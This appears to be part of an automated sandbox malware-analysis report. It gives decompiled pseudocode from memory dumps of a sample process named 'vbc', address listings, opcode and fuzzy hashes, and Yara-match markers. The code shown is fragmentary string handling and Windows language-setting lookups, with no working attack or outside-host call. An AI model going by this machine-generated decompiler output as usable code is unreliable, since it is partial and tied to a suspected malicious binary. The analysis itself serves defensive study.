								E0041A780( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7, _t70);
								_push(1);
								_t73 = _t256 - 0x308; // 0x71f7e68d
								E00409EA0(_t253 + 0xe90, _t253);
								_t75 = _t256 - 0x308; // 0x71f7e68d
								E0041A780(E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7) +  *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7, _t75);
								_t82 = _t256 - 0x58; // 0x71f7e93d
								E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0xc7, _t82, 0);
								_t85 = _t256 - 0x308; // 0x71f7e68d
								E00409EA0(_t192, _t253, _t253, _t85, 0x4a, 1, _t253);
								_t87 = _t256 - 0x308; // 0x71f7e68d
								E0041A780( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167, _t87);
								_t90 = _t256 - 0x308; // 0x71f7e68d
								E00409EA0(_t192, _t253, _t253, _t90, 0x4b, 1, _t73);
								_t92 = _t256 - 0x308; // 0x71f7e68d
								E0041A780(E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167) +  *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167, _t92);
								_t99 = _t256 - 0x58; // 0x71f7e93d
								E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x167, _t99, 0);
								_t102 = _t256 - 0x308; // 0x71f7e68d
								E00409EA0(_t192, _t253, _t253, _t102, 0x4f, 1, 0x47);
								_t104 = _t256 - 0x308; // 0x71f7e68d
								__eflags = E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287) +  *((intOrPtr*)(_t253 + 0x14a4));
								E0041A780(E0041A3B0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287) +  *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287, _t104);
								_t111 = _t256 - 0x58; // 0x71f7e93d
								E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287, _t111, 0);
								_t129 = E0041A4E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x287, _t192, 0);
								_t190 =  *((intOrPtr*)(_t256 - 0x14));
								_t262 = _t262 + 0x144;
							}
							_t190 = _t190 + 1;
							_t249 = _t249 + 0x388;
							 *((intOrPtr*)(_t256 - 0x14)) = _t190;
							__eflags = _t249 - 0x1c40;
						} while (_t249 < 0x1c40);
						return _t129;
						goto L15;
					}
				} else {
					return __eax;
				}
				L15:
			}




















                                                    0x004162f6
                                                    0x004162f7
                                                    0x0041635e
                                                    0x0041635e
                                                    0x0041635e
                                                    0x00416360
                                                    0x00416362
                                                    0x00416366
                                                    0x00416366
                                                    0x00416366
                                                    0x00416367
                                                    0x00416367
                                                    0x00416367
                                                    0x0041636a
                                                    0x00000000
                                                    0x00000000
                                                    0x00416342
                                                    0x00416346
                                                    0x00416349
                                                    0x0041634e
                                                    0x00416351
                                                    0x00416351
                                                    0x00416353
                                                    0x00416353
                                                    0x00416357
                                                    0x00000000
                                                    0x00000000
                                                    0x00416359
                                                    0x0041635a
                                                    0x0041635c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0041635c
                                                    0x00416353
                                                    0x00416371
                                                    0x00416378
                                                    0x0041637f
                                                    0x00416383
                                                    0x00416387
                                                    0x0041638a
                                                    0x00416390
                                                    0x00416399
                                                    0x004163a2
                                                    0x004163a9
                                                    0x004163ae
                                                    0x004163be
                                                    0x004163c6
                                                    0x004163d2
                                                    0x004163de
                                                    0x004163e9
                                                    0x004163ee
                                                    0x004163ee
                                                    0x004163f1
                                                    0x004163f3
                                                    0x004163f6
                                                    0x004163f9
                                                    0x00416400
                                                    0x00416400
                                                    0x00416406
                                                    0x0041640c
                                                    0x00416412
                                                    0x0041641f
                                                    0x00416426
                                                    0x0041642d
                                                    0x00416440
                                                    0x00416445
                                                    0x00416450
                                                    0x00416459
                                                    0x0041645d
                                                    0x00416464
                                                    0x00416470
                                                    0x0041647f
                                                    0x00416486
                                                    0x0041648a
                                                    0x0041648e
                                                    0x0041649e
                                                    0x004164aa
                                                    0x004164b0
                                                    0x004164b5
                                                    0x004164b9
                                                    0x004164c5
                                                    0x004164cc
                                                    0x004164d1
                                                    0x004164d5
                                                    0x004164dc
                                                    0x004164e2
                                                    0x004164e7
                                                    0x004164ea
                                                    0x004164ef
                                                    0x004164f6
                                                    0x004164fb
                                                    0x004164ff
                                                    0x00416505
                                                    0x00416509
                                                    0x00416510
                                                    0x00416515
                                                    0x0041651f
                                                    0x0041652c
                                                    0x00416538
                                                    0x00416546
                                                    0x0041654f
                                                    0x00416555
                                                    0x00416565
                                                    0x0041656d
                                                    0x00416578
                                                    0x00416587
                                                    0x0041658c
                                                    0x00416590
                                                    0x00416598
                                                    0x004165a6
                                                    0x004165cb
                                                    0x004165d8
                                                    0x004165e4
                                                    0x004165ed
                                                    0x004165f5
                                                    0x00416600
                                                    0x0041660f
                                                    0x00416618
                                                    0x00416620
                                                    0x0041662e
                                                    0x00416653
                                                    0x00416660
                                                    0x0041666c
                                                    0x00416675
                                                    0x0041667d
                                                    0x0041668b
                                                    0x0041669f
                                                    0x004166b0
                                                    0x004166bd
                                                    0x004166c9
                                                    0x004166df
                                                    0x004166e4
                                                    0x004166e7
                                                    0x004166e7
                                                    0x004166ea
                                                    0x004166eb
                                                    0x004166f1
                                                    0x004166f4
                                                    0x004166f4
                                                    0x00416706
                                                    0x00000000
                                                    0x00416706
                                                    0x004162fd
                                                    0x00416303
                                                    0x00416303
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: =$www.$www.
                                                    • API String ID: 0-3343787489
                                                    • Opcode ID: 8a69f24caac826e16a5dad2e681daa35f24bcc84a2534cafaee34269a6a1ef26
                                                    • Instruction ID: 4370f1302d9e974ba5174e44d7d420472bb9dad722ef38a7a88f5ffe9938ecc1
                                                    • Opcode Fuzzy Hash: 8a69f24caac826e16a5dad2e681daa35f24bcc84a2534cafaee34269a6a1ef26
                                                    • Instruction Fuzzy Hash: 18A1DA71941204ABCB15DBB0CC82FDFB37DAF44318F04455EB6195B183DA78B688CBAA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008F26F8, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: 8c3b17126ed05b853d4837bf5130337b9cb480e39abc1a221889cc0800f61d9c
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction Fuzzy Hash: 70F0C22132855DDBDB48FA789D6177A73D5FB94300F54C039EE49C7241E631DD408691
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041584D, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d2fcd2084ff59ff0b3a78e82aba096856c42f6942f1665d61836ef2847a7e3f
                                                    • Instruction ID: a80ae7c34a1b69a87fc567a5d567371f1e6a51223c7e289b2f93a660786dfecd
                                                    • Opcode Fuzzy Hash: 0d2fcd2084ff59ff0b3a78e82aba096856c42f6942f1665d61836ef2847a7e3f
                                                    • Instruction Fuzzy Hash: 5DB0922AB8E25539912658993C508F8EFA88083075E202677E609F75928202D225829D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DF8CC, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E10D0, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E0060, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E01D4, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E010C, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DF938, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                    • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E1930, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                    • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E1148, Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00908788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00908788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00908460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0090718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00908460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0090718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00908460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00908460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00908460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0090718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008E2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008FE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008EE2A8(_t322,  &_v68, _v16);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008FE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008EE2A8(_t322,  &_v68, _t236);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0090718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008E2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008FE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008EE2A8(_v12,  &_v68, _v16);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008FE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008EE2A8(_t322,  &_v68, _t269);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0090718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008E2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008FE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008EE2A8(_v12,  &_v68, _v16);
						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008FE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008EE2A8(_t322,  &_v68, _t296);
						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                    0x00908788
